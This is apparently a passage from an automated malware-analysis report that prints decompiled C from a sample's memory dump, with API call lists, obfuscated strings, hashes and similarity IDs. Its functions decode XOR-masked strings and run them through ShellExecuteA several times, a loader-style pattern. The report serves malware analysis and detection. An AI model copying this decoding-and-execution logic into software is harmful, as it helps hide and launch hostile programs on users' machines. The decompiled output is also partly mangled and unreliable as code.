				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				_t451 = _t143;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t144 = E00B427DA(_t455 + 0x34);
				_t333 =  *((intOrPtr*)(_t455 + 0x10)) - _t144;
				do {
					_t233 =  *_t144;
					 *((char*)(_t144 + _t333)) = _t233;
					_t144 = _t144 + 1;
				} while (_t233 != 0);
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t145 = E00B427DA(_t455 + 0x34);
				_t335 = _t363 - _t145;
				do {
					_t235 =  *_t145;
					 *((char*)(_t145 + _t335)) = _t235;
					_t145 = _t145 + 1;
				} while (_t235 != 0);
				_t23 = _t455 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t146 = E00B427DA(_t23);
				_t337 =  *((intOrPtr*)(_t455 + 0x14)) - _t146;
				do {
					_t237 =  *_t146;
					 *((char*)(_t146 + _t337)) = _t237;
					_t146 = _t146 + 1;
				} while (_t237 != 0);
				_t29 = _t455 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t147 = E00B427DA(_t29);
				_t339 =  *((intOrPtr*)(_t455 + 0x18)) - _t147;
				do {
					_t239 =  *_t147;
					 *((char*)(_t147 + _t339)) = _t239;
					_t147 = _t147 + 1;
				} while (_t239 != 0);
				_t35 = _t455 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t455 + 0x34)) = 0x2a62226f;
				 *((intOrPtr*)(_t455 + 0x38)) = 0x2b252427;
				 *((intOrPtr*)(_t455 + 0x3c)) = 0x68693b;
				_t148 = E00B427DA(_t35);
				_t341 = _t435 - _t148;
				do {
					_t241 =  *_t148;
					 *((char*)(_t148 + _t341)) = _t241;
					_t148 = _t148 + 1;
				} while (_t241 != 0);
				_t342 = _t225;
				_t436 = _t225;
				do {
					_t149 =  *_t342;
					_t342 = _t342 + 1;
				} while (_t149 != 0);
				_t343 = _t342 - _t436;
				_t365 =  *((intOrPtr*)(_t455 + 0x10)) - 1;
				do {
					_t150 =  *(_t365 + 1);
					_t365 = _t365 + 1;
				} while (_t150 != 0);
				_t243 = _t343 >> 2;
				memcpy(_t365, _t436, _t243 << 2);
				_t344 = _t225;
				memcpy(_t436 + _t243 + _t243, _t436, _t343 & 0x00000003);
				_t457 = _t455 + 0x18;
				_t437 = _t344;
				do {
					_t153 =  *_t344;
					_t344 = _t344 + 1;
				} while (_t153 != 0);
				_t345 = _t344 - _t437;
				_t371 =  *((intOrPtr*)(_t457 + 0x1c)) - 1;
				do {
					_t154 =  *(_t371 + 1);
					_t371 = _t371 + 1;
				} while (_t154 != 0);
				_t249 = _t345 >> 2;
				memcpy(_t371, _t437, _t249 << 2);
				_t346 = _t225;
				memcpy(_t437 + _t249 + _t249, _t437, _t345 & 0x00000003);
				_t459 = _t457 + 0x18;
				_t438 = _t346;
				do {
					_t157 =  *_t346;
					_t346 = _t346 + 1;
				} while (_t157 != 0);
				_t347 = _t346 - _t438;
				_t377 =  *((intOrPtr*)(_t459 + 0x14)) - 1;
				do {
					_t158 =  *(_t377 + 1);
					_t377 = _t377 + 1;
				} while (_t158 != 0);
				_t255 = _t347 >> 2;
				memcpy(_t377, _t438, _t255 << 2);
				_t348 = _t225;
				memcpy(_t438 + _t255 + _t255, _t438, _t347 & 0x00000003);
				_t461 = _t459 + 0x18;
				_t439 = _t348;
				do {
					_t161 =  *_t348;
					_t348 = _t348 + 1;
				} while (_t161 != 0);
				_t349 = _t348 - _t439;
				_t383 =  *((intOrPtr*)(_t461 + 0x18)) - 1;
				do {
					_t162 =  *(_t383 + 1);
					_t383 = _t383 + 1;
				} while (_t162 != 0);
				_t261 = _t349 >> 2;
				memcpy(_t383, _t439, _t261 << 2);
				memcpy(_t439 + _t261 + _t261, _t439, _t349 & 0x00000003);
				_t463 = _t461 + 0x18;
				_t440 = _t225;
				do {
					_t165 =  *_t225;
					_t225 = _t225 + 1;
				} while (_t165 != 0);
				_t226 = _t225 - _t440;
				_t389 =  *((intOrPtr*)(_t463 + 0x20)) - 1;
				do {
					_t166 =  *(_t389 + 1);
					_t389 = _t389 + 1;
				} while (_t166 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t267 = _t226 >> 2;
				memcpy(_t389, _t440, _t267 << 2);
				_t464 = _t463 + 0xc;
				asm("movups [esp+0x34], xmm0");
				asm("movaps xmm0, [0xb3de90]");
				asm("movups [esp+0x44], xmm0");
				 *((intOrPtr*)(_t464 + 0x74)) = 0xafc3d3ac;
				asm("movaps xmm0, [0xb3de50]");
				memcpy(_t440 + _t267 + _t267, _t440, _t226 & 0x00000003);
				_t465 = _t464 + 0xc;
				asm("movups [esp+0x54], xmm0");
				_t56 = _t465 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t465 + 0x78)) = 0xa5afc1d6;
				asm("movaps xmm0, [0xb3de20]");
				asm("movups [esp+0x64], xmm0");
				 *((char*)(_t465 + 0x7c)) = 0;
				_t169 = E00B4A2DD(_t56);
				_t350 = _t169;
				_t441 = _t169;
				do {
					_t170 =  *_t350;
					_t350 = _t350 + 1;
				} while (_t170 != 0);
				_t351 = _t350 - _t441;
				_t395 =  *((intOrPtr*)(_t465 + 0x10)) - 1;
				do {
					_t171 =  *(_t395 + 1);
					_t395 = _t395 + 1;
				} while (_t171 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t274 = _t351 >> 2;
				memcpy(_t395, _t441, _t274 << 2);
				memcpy(_t441 + _t274 + _t274, _t441, _t351 & 0x00000003);
				_t467 = _t465 + 0x18;
				asm("movups [esp+0x34], xmm0");
				_t62 = _t467 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t467 + 0x54)) = 0x26304d32;
				asm("movaps xmm0, [0xb3deb0]");
				asm("movups [esp+0x44], xmm0");
				 *((intOrPtr*)(_t467 + 0x58)) = 0x26344925;
				 *((intOrPtr*)(_t467 + 0x5c)) = 0x422e3b44;
				 *((short*)(_t467 + 0x60)) = 0x4e;
				_t174 = E00B4A2F8(_t62);
				_t352 = _t174;
				_t442 = _t174;
				do {
					_t175 =  *_t352;
					_t352 = _t352 + 1;
				} while (_t175 != 0);
				_t353 = _t352 - _t442;
				_t401 =  *((intOrPtr*)(_t467 + 0x1c)) - 1;
				do {
					_t176 =  *(_t401 + 1);
					_t401 = _t401 + 1;
				} while (_t176 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t281 = _t353 >> 2;
				memcpy(_t401, _t442, _t281 << 2);
				memcpy(_t442 + _t281 + _t281, _t442, _t353 & 0x00000003);
				_t469 = _t467 + 0x18;
				asm("movups [esp+0x34], xmm0");
				_t70 = _t469 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t469 + 0x64)) = 0x5a36235c;
				asm("movaps xmm0, [0xb3dd00]");
				asm("movups [esp+0x44], xmm0");
				 *((short*)(_t469 + 0x68)) = 0x56;
				asm("movaps xmm0, [0xb3dd30]");
				asm("movups [esp+0x54], xmm0");
				_t179 = E00B4A2C2(_t70);
				_t354 = _t179;
				_t443 = _t179;
				do {
					_t180 =  *_t354;
					_t354 = _t354 + 1;
				} while (_t180 != 0);
				_t355 = _t354 - _t443;
				_t407 =  *((intOrPtr*)(_t469 + 0x14)) - 1;
				do {
					_t181 =  *(_t407 + 1);
					_t407 = _t407 + 1;
				} while (_t181 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t288 = _t355 >> 2;
				memcpy(_t407, _t443, _t288 << 2);
				memcpy(_t443 + _t288 + _t288, _t443, _t355 & 0x00000003);
				_t471 = _t469 + 0x18;
				asm("movups [esp+0x34], xmm0");
				_t76 = _t471 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t471 + 0x54)) = 0x2227334c;
				asm("movaps xmm0, [0xb3db20]");
				asm("movups [esp+0x44], xmm0");
				 *((intOrPtr*)(_t471 + 0x58)) = 0x4b273748;
				 *((intOrPtr*)(_t471 + 0x5c)) = 0x49432d3a;
				 *((char*)(_t471 + 0x60)) = 0;
				_t184 = E00B4A2A7(_t76);
				_t356 = _t184;
				_t444 = _t184;
				do {
					_t185 =  *_t356;
					_t356 = _t356 + 1;
				} while (_t185 != 0);
				_t357 = _t356 - _t444;
				_t413 =  *((intOrPtr*)(_t471 + 0x18)) - 1;
				do {
					_t186 =  *(_t413 + 1);
					_t413 = _t413 + 1;
				} while (_t186 != 0);
				asm("movaps xmm0, [0xb3dce0]");
				_t295 = _t357 >> 2;
				memcpy(_t413, _t444, _t295 << 2);
				memcpy(_t444 + _t295 + _t295, _t444, _t357 & 0x00000003);
				_t473 = _t471 + 0x18;
				_t84 = _t473 + 0x34; // 0x2a62226f
				 *((intOrPtr*)(_t473 + 0x44)) = 0x36367e70;
				asm("movups [esp+0x34], xmm0");
				 *((intOrPtr*)(_t473 + 0x48)) = 0x75762c3a;
				 *((char*)(_t473 + 0x4c)) = 0;
				_t189 = E00B42CF5(_t84);
				_t358 = _t189;
				_t445 = _t189;
				do {
					_t190 =  *_t358;
					_t358 = _t358 + 1;
				} while (_t190 != 0);
				_t228 =  *(_t473 + 0x20);
				_t359 = _t358 - _t445;
				_t418 = _t228 - 1;
				do {
					_t191 =  *(_t418 + 1);
					_t418 = _t418 + 1;
				} while (_t191 != 0);
				_t302 = _t359 >> 2;
				memcpy(_t418, _t445, _t302 << 2);
				memcpy(_t445 + _t302 + _t302, _t445, _t359 & 0x00000003);
				_t475 = _t473 + 0x18;
				_t446 = _t451;
				do {
					_t194 =  *_t451;
					_t451 = _t451 + 1;
				} while (_t194 != 0);
				_t452 = _t451 - _t446;
				_t423 = _t228 - 1;
				do {
					_t195 =  *(_t423 + 1);
					_t423 = _t423 + 1;
				} while (_t195 != 0);
				asm("movaps xmm0, [0xb3dad0]");
				_t308 = _t452 >> 2;
				memcpy(_t423, _t446, _t308 << 2);
				memcpy(_t446 + _t308 + _t308, _t446, _t452 & 0x00000003);
				_t477 = _t475 + 0x18;
				_t95 = _t477 + 0x34; // 0x2a62226f
				asm("movups [esp+0x34], xmm0");
				_t198 = E00B42D2B(_t95);
				_t360 = _t198;
				_t447 = _t198;
				do {
					_t199 =  *_t360;
					_t360 = _t360 + 1;
				} while (_t199 != 0);
				_t361 = _t360 - _t447;
				_t428 = _t228 - 1;
				do {
					_t200 =  *(_t428 + 1);
					_t428 = _t428 + 1;
				} while (_t200 != 0);
				 *((intOrPtr*)(_t477 + 0x28)) = 0x6d262c23;
				_t315 = _t361 >> 2;
				_t202 = memcpy(_t428, _t447, _t315 << 2);
				_t478 = _t477 + 0xc;
				 *((intOrPtr*)(_t478 + 0x2c)) = 0x233d21;
				 *((intOrPtr*)(_t478 + 0x24)) = 0x2d27312f;
				_t203 = memcpy(_t447 + _t315 + _t315, _t447, _t361 & 0x00000003);
				_t479 = _t478 + 0xc;
				_t103 = _t479 + 0x34; // 0x2a62226f
				 *(_t479 + 0x30) = _t203;
				_t204 = E00B46346(_t103);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t204,  *(_t478 + 0x18), _t202, _t202);
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				_t107 = _t479 + 0x24; // 0x2d27312f
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t208 = E00B46346(_t479 + 0x34);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t208,  *_t107, 0, 0);
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t212 = E00B46346(_t479 + 0x34);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t212,  *(_t479 + 0x1c), 0, 0);
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t216 = E00B46346(_t479 + 0x34);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t216,  *(_t479 + 0x20), 0, 0);
				 *((intOrPtr*)(_t479 + 0x28)) = 0x6d262c23;
				 *((intOrPtr*)(_t479 + 0x38)) = 0x233d21;
				 *((intOrPtr*)(_t479 + 0x2c)) = 0x2d27312f;
				 *(_t479 + 0x30) = 0;
				_t220 = E00B46346(_t479 + 0x34);
				ShellExecuteA(0, E00B432BE(_t479 + 0x30), _t220, _t228, 0, 0);
				return E00B4AE43( *(_t479 + 0x80) ^ _t479);
			}

APIs

ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B4A18C
ShellExecuteA.SHELL32(00000000,00000000,00000000,/1'-,00000000,00000000), ref: 00B4A1CC
ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B4A20C
ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B4A24C
ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B4A289

Strings

H7'K, xrefs: 00B4A05E
;ih, xrefs: 00B49E16
:-CI, xrefs: 00B4A066
V, xrefs: 00B49FFA
/1'-, xrefs: 00B4A19E
L3'", xrefs: 00B4A04A
p~66, xrefs: 00B4A0AA
N, xrefs: 00B49FA2
52'1, xrefs: 00B49D21
/1'-, xrefs: 00B4A26B
o"b*, xrefs: 00B49DA0
!=#, xrefs: 00B4A263
:,vu, xrefs: 00B4A0B7
\#6Z, xrefs: 00B49FE6
'$%+, xrefs: 00B49E0E

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteShell
String ID: !=#$'$%+$/1'-$/1'-$52'1$:,vu$:-CI$;ih$H7'K$L3'"$N$V$\#6Z$o"b*$p~66
API String ID: 587946157-1764487608
Opcode ID: fdb9f0b35945b9672c15160a09b62d7b24a0d304a33419ebf0b70b58785a7a07
Instruction ID: 71fd287016c26cd315b4cbc2874510c08d5545d827575ed635e6f3ac3a6e81a5
Opcode Fuzzy Hash: fdb9f0b35945b9672c15160a09b62d7b24a0d304a33419ebf0b70b58785a7a07
Instruction Fuzzy Hash: 590213605087859FCB16DF2895902ABFBE2FFD9700F449A8CF8C657211DF319A4ADB12

Uniqueness

Uniqueness Score: -1.00%

Function 00B499C5, Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 156
COMMONCrypto

Download Yara Rule

C-Code - Quality: 85%

			E00B499C5(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t55;
				intOrPtr _t57;
				char _t60;
				void _t61;
				void _t62;
				void _t66;
				void _t67;
				void _t70;
				void _t71;
				void* _t73;
				void _t75;
				void _t76;
				int _t78;
				char* _t79;
				char* _t80;
				void* _t85;
				signed int _t86;
				char* _t87;
				void* _t90;
				intOrPtr* _t91;
				signed int _t93;
				void* _t98;
				signed int _t100;
				signed int _t106;
				void* _t111;
				signed int _t113;
				void* _t123;
				void* _t124;
				signed int _t125;
				void* _t126;
				signed int _t127;
				intOrPtr _t129;
				void* _t130;
				void* _t135;
				void* _t140;
				void* _t145;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t158;
				signed int _t159;
				signed int _t161;
				void* _t162;
				void* _t163;
				void* _t165;
				void* _t166;
				void* _t167;
				void* _t168;

				_t55 =  *0xb69014; // 0x7e8b4fb6
				 *(_t161 + 0x3c) = _t55 ^ _t161;
				_t85 =  *(_t161 + 0x4c);
				_t158 =  *(_t161 + 0x4c);
				_push(0x208);
				_t57 = E00B509A2();
				asm("movaps xmm0, [0xb3dcd0]");
				_t129 = _t57;
				 *((intOrPtr*)(_t161 + 0x18)) = _t129;
				_t90 = 0;
				asm("movups [esp+0x20], xmm0");
				 *((intOrPtr*)(_t161 + 0x30)) = 0x73372531;
				 *((intOrPtr*)(_t161 + 0x34)) = 0x7738217b;
				 *((char*)(_t161 + 0x38)) = 0;
				do {
					_t8 = _t90 + 0x40; // 0x40
					 *(_t161 + _t90 + 0x20) =  *(_t161 + _t90 + 0x20) ^ _t8;
					_t90 = _t90 + 1;
				} while (_t90 < 0x18);
				_t91 = _t161 + 0x20;
				 *((char*)(_t161 + 0x38)) = 0;
				_t123 = _t129 - _t91;
				do {
					_t60 =  *_t91;
					 *((char*)(_t123 + _t91)) = _t60;
					_t91 = _t91 + 1;
				} while (_t60 != 0);
				_t152 = _t85;
				do {
					_t61 =  *_t85;
					_t85 = _t85 + 1;
				} while (_t61 != 0);
				_t86 = _t85 - _t152;
				_t130 = _t129 - 1;
				do {
					_t62 =  *(_t130 + 1);
					_t130 = _t130 + 1;
				} while (_t62 != 0);
				 *((intOrPtr*)(_t161 + 0x10)) = 0x31366e60;
				_t93 = _t86 >> 2;
				memcpy(_t130, _t152, _t93 << 2);
				_t162 = _t161 + 0xc;
				 *((short*)(_t162 + 0x14)) = 0x64;
				memcpy(_t152 + _t93 + _t93, _t152, _t86 & 0x00000003);
				_t163 = _t162 + 0xc;
				_t98 = 0;
				do {
					_t20 = _t98 + 0x40; // 0x40
					 *(_t163 + _t98 + 0x10) =  *(_t163 + _t98 + 0x10) ^ _t20;
					_t98 = _t98 + 1;
				} while (_t98 < 5);
				_t25 = _t163 + 0x10; // 0x31366e60
				_t124 = _t25;
				 *((char*)(_t163 + 0x15)) = 0;
				_t153 = _t124;
				do {
					_t66 =  *_t124;
					_t124 = _t124 + 1;
				} while (_t66 != 0);
				_t87 =  *(_t163 + 0x18);
				_t125 = _t124 - _t153;
				_t135 = _t87 - 1;
				do {
					_t67 =  *(_t135 + 1);
					_t135 = _t135 + 1;
				} while (_t67 != 0);
				_t100 = _t125 >> 2;
				memcpy(_t135, _t153, _t100 << 2);
				memcpy(_t153 + _t100 + _t100, _t153, _t125 & 0x00000003);
				_t165 = _t163 + 0x18;
				_t154 = _t158;
				do {
					_t70 =  *_t158;
					_t158 = _t158 + 1;
				} while (_t70 != 0);
				_t159 = _t158 - _t154;
				_t140 = _t87 - 1;
				do {
					_t71 =  *(_t140 + 1);
					_t140 = _t140 + 1;
				} while (_t71 != 0);
				asm("movaps xmm0, [0xb3def0]");
				_t106 = _t159 >> 2;
				memcpy(_t140, _t154, _t106 << 2);
				_t166 = _t165 + 0xc;
				 *((intOrPtr*)(_t166 + 0x40)) = 0x5a5b5859;
				 *((intOrPtr*)(_t166 + 0x44)) = 0x475f505e;
				asm("movups [esp+0x20], xmm0");
				 *((short*)(_t166 + 0x48)) = 0xf47;
				asm("movaps xmm0, [0xb3dee0]");
				_t73 = memcpy(_t154 + _t106 + _t106, _t154, _t159 & 0x00000003);
				_t167 = _t166 + 0xc;
				asm("movups [esp+0x30], xmm0");
				 *(_t167 + 0x4a) = _t73;
				_t111 = 0;
				do {
					_t38 = _t111 + 0x40; // 0x40
					 *(_t167 + _t111 + 0x20) =  *(_t167 + _t111 + 0x20) ^ _t38;
					_t111 = _t111 + 1;
				} while (_t111 < 0x2a);
				_t126 = _t167 + 0x20;
				 *(_t167 + 0x4a) = 0;
				_t155 = _t126;
				do {
					_t75 =  *_t126;
					_t126 = _t126 + 1;
				} while (_t75 != 0);
				_t127 = _t126 - _t155;
				_t145 = _t87 - 1;
				do {
					_t76 =  *(_t145 + 1);
					_t145 = _t145 + 1;
				} while (_t76 != 0);
				 *((intOrPtr*)(_t167 + 0x10)) = 0x6d262c23;
				_t113 = _t127 >> 2;
				_t78 = memcpy(_t145, _t155, _t113 << 2);
				_t168 = _t167 + 0xc;
				 *((intOrPtr*)(_t168 + 0x14)) = 0x233d21;
				 *((intOrPtr*)(_t168 + 0x18)) = 0x2d27312f;
				_t79 = memcpy(_t155 + _t113 + _t113, _t155, _t127 & 0x00000003);
				_t169 = _t168 + 0xc;
				 *(_t168 + 0x34) = _t79;
				_t80 = E00B46346(_t169 + 0x1c);
				ShellExecuteA(0, E00B432BE(_t169 + 0x28), _t80, _t87, _t79, _t78);
				return E00B4AE43( *(_t169 + 0x4c) ^ _t169);
			}

APIs

ShellExecuteA.SHELL32(00000000,00000000,00000000,?,00000000,00000000), ref: 00B49B75

Strings

!=#, xrefs: 00B49B43
^P_G, xrefs: 00B49ADC
{!8w, xrefs: 00B49A06
1%7s, xrefs: 00B499FE
/1'-, xrefs: 00B49B4E
`n61, xrefs: 00B49A79
YX[Z, xrefs: 00B49AD1

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExecuteShell
String ID: !=#$/1'-$1%7s$YX[Z$^P_G$`n61${!8w
API String ID: 587946157-266102048
Opcode ID: d8ef038593224ddf965ddcee9b7ca68e81a9d6928fbfadc48686e7bd5cf9c48f
Instruction ID: fa0403e4fa46675231ce230df45d2f306ceae1ad49c2116fade0a2db004d0afa
Opcode Fuzzy Hash: d8ef038593224ddf965ddcee9b7ca68e81a9d6928fbfadc48686e7bd5cf9c48f
Instruction Fuzzy Hash: EA5117711087854BCB19CF28949066FFFE1FFDA344F44069DE9C65B212DB629A0AC7A2

Uniqueness

Uniqueness Score: -1.00%

Function 00B5CB6A, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 253
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00B5CB6A(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, signed short* _a8, intOrPtr _a12) {
				intOrPtr* _v8;
				short _v12;
				signed int _v32;
				intOrPtr _v40;
				signed int _v52;
				char _v272;
				short _v292;
				void* _t33;
				short* _t34;
				intOrPtr* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed short _t39;
				signed short* _t42;
				intOrPtr _t45;
				void* _t47;
				signed int _t50;
				void* _t52;
				signed int _t56;
				void* _t69;
				void* _t73;
				void* _t74;
				void* _t78;
				intOrPtr* _t85;
				short* _t87;
				intOrPtr* _t92;
				intOrPtr* _t96;
				short _t114;
				void* _t115;
				intOrPtr* _t117;
				intOrPtr _t120;
				signed int* _t121;
				intOrPtr* _t124;
				signed short _t126;
				int _t128;
				void* _t132;
				signed int _t133;

				_push(__ecx);
				_push(__ecx);
				_push(__ebx);
				_t85 = _a4;
				_push(__esi);
				_push(__edi);
				_t33 = E00B5830D(__ecx, __edx);
				_t114 = 0;
				_v12 = 0;
				_t3 = _t33 + 0x50; // 0x50
				_t124 = _t3;
				_t4 = _t124 + 0x250; // 0x2a0
				_t34 = _t4;
				 *((intOrPtr*)(_t124 + 8)) = 0;
				 *_t34 = 0;
				_t6 = _t124 + 4; // 0x54
				_t117 = _t6;
				_v8 = _t34;
				_t92 = _t85;
				_t35 = _t85 + 0x80;
				 *_t124 = _t85;
				 *_t117 = _t35;
				if( *_t35 != 0) {
					E00B5CAFB(0xb360a0, 0x16, _t117);
					_t92 =  *_t124;
					_t132 = _t132 + 0xc;
					_t114 = 0;
				}
				_push(_t124);
				if( *_t92 == _t114) {
					E00B5C460(_t92);
					goto L12;
				} else {
					if( *((intOrPtr*)( *_t117)) == _t114) {
						E00B5C584();
					} else {
						E00B5C4E9(_t92);
					}
					if( *((intOrPtr*)(_t124 + 8)) == 0) {
						_t78 = E00B5CAFB(0xb35d90, 0x40, _t124);
						_t132 = _t132 + 0xc;
						if(_t78 != 0) {
							_push(_t124);
							if( *((intOrPtr*)( *_t117)) == 0) {
								E00B5C584();
							} else {
								E00B5C4E9(0);
							}
							L12:
						}
					}
				}
				if( *((intOrPtr*)(_t124 + 8)) == 0) {
					L37:
					_t37 = 0;
					goto L38;
				} else {
					_t38 = _t85 + 0x100;
					if( *_t85 != 0 ||  *_t38 != 0) {
						_t39 = E00B5C9B4(_t38, _t124);
					} else {
						_t39 = GetACP();
					}
					_t126 = _t39;
					if(_t126 == 0 || _t126 == 0xfde8 || IsValidCodePage(_t126 & 0x0000ffff) == 0) {
						goto L37;
					} else {
						_t42 = _a8;
						if(_t42 != 0) {
							 *_t42 = _t126;
						}
						_t120 = _a12;
						if(_t120 == 0) {
							L36:
							_t37 = 1;
							L38:
							return _t37;
						} else {
							_t96 = _v8;
							_t15 = _t120 + 0x120; // 0xb540cc
							_t87 = _t15;
							 *_t87 = 0;
							_t115 = _t96 + 2;
							do {
								_t45 =  *_t96;
								_t96 = _t96 + 2;
							} while (_t45 != _v12);
							_t98 = _t96 - _t115 >> 1;
							_push((_t96 - _t115 >> 1) + 1);
							_t47 = E00B598A4(_t87, 0x55, _v8);
							_t133 = _t132 + 0x10;
							if(_t47 != 0) {
								L39:
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								E00B52919();
								asm("int3");
								_t131 = _t133;
								_t50 =  *0xb69014; // 0x7e8b4fb6
								_v52 = _t50 ^ _t133;
								_push(_t87);
								_push(_t126);
								_push(_t120);
								_t52 = E00B5830D(_t98, _t115);
								_t88 = _t52;
								_t121 =  *(E00B5830D(_t98, _t115) + 0x34c);
								_t128 = E00B5D2AD(_v40);
								asm("sbb ecx, ecx");
								_t56 = GetLocaleInfoW(_t128, ( ~( *(_t52 + 0x64)) & 0xfffff005) + 0x1002,  &_v292, 0x78);
								if(_t56 != 0) {
									if(E00B5BE5E(_t88, _t121, _t128,  *((intOrPtr*)(_t88 + 0x54)),  &_v272) == 0 && E00B5D3E1(_t128) != 0) {
										 *_t121 =  *_t121 | 0x00000004;
										_t121[2] = _t128;
										_t121[1] = _t128;
									}
								} else {
									 *_t121 =  *_t121 & _t56;
								}
								return E00B4AE43(_v32 ^ _t131);
							} else {
								if(E00B5DBF9(_t87, 0x1001, _t120, 0x40) == 0) {
									goto L37;
								} else {
									_t20 = _t120 + 0x80; // 0xb5402c
									_t87 = _t20;
									_t21 = _t120 + 0x120; // 0xb540cc
									if(E00B5DBF9(_t21, 0x1002, _t87, 0x40) == 0) {
										goto L37;
									} else {
										_push(0x5f);
										_t69 = E00B652C7(_t98);
										_t98 = _t87;
										if(_t69 != 0) {
											L31:
											_t22 = _t120 + 0x120; // 0xb540cc
											if(E00B5DBF9(_t22, 7, _t87, 0x40) == 0) {
												goto L37;
											} else {
												goto L32;
											}
										} else {
											_push(0x2e);
											_t74 = E00B652C7(_t98);
											_t98 = _t87;
											if(_t74 == 0) {
												L32:
												_t120 = _t120 + 0x100;
												if(_t126 != 0xfde9) {
													E00B552AD(_t98, _t126, _t120, 0x10, 0xa);
													goto L36;
												} else {
													_push(5);
													_t73 = E00B598A4(_t120, 0x10, L"utf8");
													_t133 = _t133 + 0x10;
													if(_t73 != 0) {
														goto L39;
													} else {
														goto L36;
													}
												}
											} else {
												goto L31;
											}
										}
									}
								}
							}
						}
					}
				}
			}

APIs

Part of subcall function 00B5830D: GetLastError.KERNEL32(00000000,00000001,00000004,00B51A0E,00000001,00000000,00000002,?,00B58F84,00000002,00000000,00000001,00000002), ref: 00B58312
Part of subcall function 00B5830D: SetLastError.KERNEL32(00000000,00000007,000000FF,?,00B58F84,00000002,00000000,00000001,00000002), ref: 00B583B0

GetACP.KERNEL32(00000055,?,?,?,?,?,00B53FAC,?,?,?,?,?,?,00000004), ref: 00B5CC2B
IsValidCodePage.KERNEL32(00000000,00000055,?,?,?,?,?,00B53FAC,?,?,?,?,?,?,00000004), ref: 00B5CC56
_wcschr.LIBVCRUNTIME ref: 00B5CCEA
_wcschr.LIBVCRUNTIME ref: 00B5CCF8
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00B53FAC,00000000,00B540CC), ref: 00B5CDBB

Strings

utf8, xrefs: 00B5CD28

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: b664b0eb6279fe14015a5ab2bdcc5e76d54d7dff729faeb59dca3a4d8e5e463e
Instruction ID: ff5509ddad90bb07e797845b30cd96b8304023521e9d6f847df136874270efa7
